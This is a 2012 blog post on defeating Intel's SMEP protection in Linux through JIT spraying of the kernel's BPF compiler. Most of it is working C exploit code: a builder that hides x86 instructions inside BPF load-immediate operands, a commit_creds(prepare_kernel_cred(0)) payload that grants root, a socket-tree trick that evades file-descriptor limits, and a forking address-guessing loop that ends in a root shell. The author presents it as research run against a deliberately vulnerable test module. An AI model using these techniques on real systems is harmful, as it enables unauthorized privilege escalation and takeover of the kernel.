Intel's new Ivy Bridge CPUs support a security feature called Supervisor Mode Execution Protection (SMEP). It's supposed to thwart privilege escalation attacks, by preventing the kernel from executing a payload provided by userspace. In reality, there are many ways to bypass SMEP.

This article demonstrates one particularly fun approach. Since the Linux kernel implements a just-in-time compiler for Berkeley Packet Filter programs, we can use a JIT spraying attack to build our attack payload within the kernel's memory. Along the way, we will use another fun trick to create thousands of sockets even if RLIMIT_NOFILE is set as low as 11.

If you have some idea what I'm talking about, feel free to skip the next few sections and get to the gritty details. Otherwise, I hope to provide enough background that anyone with some systems programming experience can follow along. The code is available on GitHub too.

Note to script kiddies: This code won't get you root on any real system. It's not an exploit against current Linux; it's a demonstration of how such an exploit could be modified to bypass SMEP protections.

Kernel exploitation and SMEP

The basis of kernel security is the CPU's distinction between user and kernel mode. Code running in user mode cannot manipulate kernel memory. This allows the kernel to store things (like the user ID of the current process) without fear of tampering by userspace code.

In a typical kernel exploit, we trick the kernel into jumping to our payload code while the CPU is still in kernel mode. Then we can mess with kernel data structures and gain privileges. The payload can be an ordinary function in the exploit program's memory. After all, the CPU in kernel mode is allowed to execute user memory: it's allowed to do anything!

But what if it wasn't? When SMEP is enabled, the CPU will block any attempt to execute user memory while in kernel mode. (Of course, the kernel still has ultimate authority and can disable SMEP if it wants to. The goal is to prevent unintended execution of userspace code, as in a kernel exploit.)

So even if we find a bug which lets us hijack kernel control flow, we can only direct it towards legitimate kernel code. This is a lot like exploiting a userspace program with no-execute data, and the same techniques apply.

If you haven't seen some kernel exploits before, you might want to check out the talk I gave, or the many references linked from those slides.

JIT spraying

JIT spraying [PDF] is a viable tactic when we (the attacker) control the input to a just-in-time compiler. The JIT will write into executable memory on our behalf, and we have some control over what it writes.

Of course, a JIT compiling untrusted code will be careful with what instructions it produces. The trick of JIT spraying is that seemingly innocuous instructions can be trouble when looked at another way. Suppose we input this (pseudocode) program to a JIT:

x = 0xa8XXYYZZ
x = 0xa8PPQQRR
x = ...

(Here XXYYZZ and PPQQRR stand for arbitrary three-byte quantities.) The JIT might decide to put variable x in the %eax machine register, and produce x86 code like this:

machine code      assembly (AT&T syntax)

b8 ZZ YY XX a8    mov $0xa8XXYYZZ, %eax
b8 RR QQ PP a8    mov $0xa8PPQQRR, %eax
b8 ...

Looks harmless enough. But suppose we use a vulnerability elsewhere to direct control flow to the second byte of this program. The processor will then see an instruction stream like

ZZ YY XX          (payload instruction)
a8 b8             test $0xb8, %al
RR QQ PP          (payload instruction)
a8 b8             test $0xb8, %al
...

We control those bytes ZZ YY XX and RR QQ PP. So we can smuggle any sequence of three-byte x86 instructions into an executable memory page. The classic scenario is browser exploitation: we embed our payload into a JavaScript or Flash program as above, and then exploit a browser bug to redirect control into the JIT-compiled code. But it works equally well against kernels, as we shall see.

Attacking the BPF JIT

Berkeley Packet Filters (BPF) allow a userspace program to specify which network traffic it wants to receive. Filters are virtual machine programs which run in kernel mode. This is done for efficiency; it avoids a system call round-trip for each rejected packet. Since version 3.0, Linux on AMD64 optionally implements the BPF virtual machine using a just-in-time compiler.

For our JIT spray attack, we will build a BPF program in memory.

size_t code_len = 0;
struct sock_filter code[1024];

void emit_bpf(uint16_t opcode, uint32_t operand) {
    code[code_len++] = (struct sock_filter) BPF_STMT(opcode, operand);
}

A BPF "load immediate" instruction will compile to mov $x, %eax. We embed our payload instructions inside these, exactly as we saw above.

// Embed a three-byte x86 instruction.
void emit3(uint8_t x, uint8_t y, uint8_t z) {
    union {
        uint8_t  buf[4];
        uint32_t imm;
    } operand = {
        .buf = { x, y, z, 0xa8 }
    };

    emit_bpf(BPF_LD+BPF_IMM, operand.imm);
}

// Pad shorter instructions with nops.
#define emit2(_x, _y) emit3((_x), (_y), 0x90)
#define emit1(_x)     emit3((_x), 0x90, 0x90)

Remember, the byte a8 eats the opcode b8 from the following legitimate mov instruction, turning into the harmless instruction test $0xb8, %al.

Calling a kernel function is a slight challenge because we can only use three-byte instructions. We load the function's address one byte at a time, and sign-extend from 32 bits.

void emit_call(uint32_t addr) {
    emit2(0xb4, (addr & 0xff000000) >> 24);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x00ff0000) >> 16);  // mov  $x,  %al
    emit3(0xc1, 0xe0, 0x10);                 // shl  $16, %eax
    emit2(0xb4, (addr & 0x0000ff00) >>  8);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x000000ff));        // mov  $x,  %al
    emit2(0x48, 0x98);                       // cltq
    emit2(0xff, 0xd0);                       // call *%rax
}

Then we can build a classic "get root" payload like so:

emit3(0x48, 0x31, 0xff);  // xor  %rdi, %rdi
emit_call(get_kernel_symbol("prepare_kernel_cred"));
emit3(0x48, 0x89, 0xc7);  // mov  %rax, %rdi
emit_call(get_kernel_symbol("commit_creds"));
emit1(0xc3);              // ret

This is just the C call

commit_creds(prepare_kernel_cred(0));

expressed in our strange dialect of machine code. It will give root privileges to the process the kernel is currently acting on behalf of, i.e., our exploit program.

Looking up function addresses is a well-studied part of kernel exploitation. My get_kernel_symbol just greps through /proc/kallsyms, which is a simplistic solution for demonstration purposes. In a real-world exploit you would search a number of sources, including hard-coded values for the precompiled kernels put out by major distributions.

Alternatively the JIT spray payload could just disable SMEP, then jump to a traditional payload in userspace memory. We don't need any kernel functions to disable SMEP; we just poke a CPU control register. Once we get to the traditional payload, we're running normal C code in kernel mode, and we have the flexibility to search memory for any functions or data we might need.

Filling memory with sockets

The "spray" part of JIT spraying involves creating many copies of the payload in memory, and then making an informed guess of the address of one of them. In Dion Blazakis's original paper, this is done using a separate information leak in the Flash plugin.

For this kernel exploit, it turns out that we don't need any information leak. The BPF JIT uses module_alloc to allocate memory in the 1.5 GB space reserved for kernel modules. And the compiled program is aligned to a page, i.e., a multiple of 4 kB. So we have fewer than 19 bits of address to guess. If we can get 8000 copies of our program into memory, we have a 1 in 50 chance on each guess, which is not too bad.

Each socket can only have one packet filter attached, so we need to create a bunch of sockets. This means we could run into the resource limit on the number of open files. But there's a fun way around this limitation. (I learned this trick from Nelson Elhage but I haven't seen it published before.)

UNIX domain sockets can transmit things other than raw bytes. In particular, they can transmit file descriptors¹. An FD sitting in a UNIX socket buffer might have already been closed by the sender. But it could be read back out in the future, so the kernel has to maintain all data structures relating to the FD — including BPF programs!

So we can make as many BPF-filtered sockets as we want, as long as we send them into other sockets and close them as we go. There are limits on the number of FDs enqueued on a socket, as well as the depth² of sockets sent through sockets sent through etc. But we can easily hit our goal of 8000 filter programs using a tree structure.

#define SOCKET_FANOUT 20
#define SOCKET_DEPTH   3

// Create a socket with our BPF program attached.
int create_filtered_socket() {
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &filt, sizeof(filt));
    return fd;
}

// Send an fd through a UNIX socket.
void send_fd(int dest, int fd_to_send);

// Create a whole bunch of filtered sockets.
void create_socket_tree(int parent, size_t depth) {
    int fds[2];
    size_t i;
    for (i=0; i<SOCKET_FANOUT; i++) {
        if (depth == (SOCKET_DEPTH - 1)) {
            // Leaf of the tree.
            // Create a filtered socket and send it to 'parent'.
            fds[0] = create_filtered_socket();
            send_fd(parent, fds[0]);
            close(fds[0]);
        } else {
            // Interior node of the tree.
            // Send a subtree into a UNIX socket pair.
            socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
            create_socket_tree(fds[0], depth+1);

            // Send the pair to 'parent' and close it.
            send_fd(parent, fds[0]);
            send_fd(parent, fds[1]);
            close(fds[0]);
            close(fds[1]);
        }
    }
}

The interface for sending FDs through a UNIX socket is really, really ugly, so I didn't show that code here. You can check out the implementation of send_fd if you want to.

The exploit

Since this whole article is about a strategy for exploiting kernel bugs, we need some kernel bug to exploit. For demonstration purposes I'll load an obviously insecure kernel module which will jump to any address we write to /proc/jump.

We know that a JIT-produced code page is somewhere in the region used for kernel modules. We want to land 3 bytes into this page, skipping an xor %eax, %eax (31 c0) and the initial b8 opcode.

#define MODULE_START 0xffffffffa0000000UL
#define MODULE_END   0xfffffffffff00000UL
#define MODULE_PAGES ((MODULE_END - MODULE_START) / 0x1000)

#define PAYLOAD_OFFSET 3

A bad guess will likely oops the kernel and kill the current process. So we fork off child processes to do the guessing, and keep doing this as long as they're dying with SIGKILL.

int status, jump_fd, urandom;
unsigned int pgnum;
uint64_t payload_addr;

// ...

jump_fd = open("/proc/jump",   O_WRONLY);
urandom = open("/dev/urandom", O_RDONLY);

do {
    if (!fork()) {
        // Child process
        read(urandom, &pgnum, sizeof(pgnum));
        pgnum %= MODULE_PAGES;
        payload_addr = MODULE_START + (0x1000 * pgnum) + PAYLOAD_OFFSET;

        write(jump_fd, &payload_addr, sizeof(payload_addr));
        execl("/bin/sh", "sh", NULL);  // Root shell!
    } else {
        wait(&status);
    }
} while (WIFSIGNALED(status) && (WTERMSIG(status) == SIGKILL));

The forked children get a copy the whole process's state, of course, but they don't actually need it. The BPF programs live in kernel memory, which is shared by all processes. So the program that sets up the payload could be totally unrelated to the one that guesses addresses.

Notes

The full source is available on GitHub. It includes some error handling and cleanup code that I elided above.

I'll admit that this is mostly a curiosity, for two reasons:

SMEP is not widely deployed yet.
The BPF JIT is disabled by default, and distributions don't enable it.

Unless Intel abandons SMEP in subsequent processors, it will be widespread within a few years. It's less clear that the BPF JIT will ever catch on as a default configuration. But I'll note in passing that Linux is now using BPF programs for process sandboxing as well.

The BPF JIT is enabled by writing 1 to /proc/sys/net/core/bpf_jit_enable. You can write 2 to enable a debug mode, which will print the compiled program and its address to the kernel log. This makes life unreasonably easy for my exploit, by removing the address guesswork.

I don't have a CPU with SMEP, but I did try a grsecurity / PaX hardened kernel. PaX's KERNEXEC feature implements³ in software a policy very similar to SMEP. And indeed, the JIT spray exploit succeeds where a traditional jump-to-userspace fails. (grsecurity has other features that would mitigate this attack, like the ability to lock out users who oops the kernel.)

The ARM, SPARC, and 64-bit PowerPC architectures each have their own BPF JIT. But I don't think they can be used for JIT spraying, because these architectures have fixed-size, aligned instructions. Perhaps on an ARM kernel built for Thumb-2...

Actually, file descriptions. The description is the kernel state pertaining to an open file. The descriptor is a small integer referring to a file description. When we send an FD into a UNIX socket, the descriptor number received on the other end might be different, but it will refer to the same description.↩
While testing this code, I got the error ETOOMANYREFS. This was easy to track down, as there's only one place in the entire kernel where it is used.↩
On i386, KERNEXEC uses x86 segmentation, with negligible performance impact. Unfortunately, AMD64's vestigial segmentation is not good enough, so there KERNEXEC relies on a GCC plugin to instrument every computed control flow instruction in the kernel. Specifically, it ors the target address with (1 << 63). If the target was a userspace address, the new address will be non-canonical and the processor will fault.↩

main is usually a function

Saturday, November 17, 2012

Attacking hardened Linux systems with kernel JIT spraying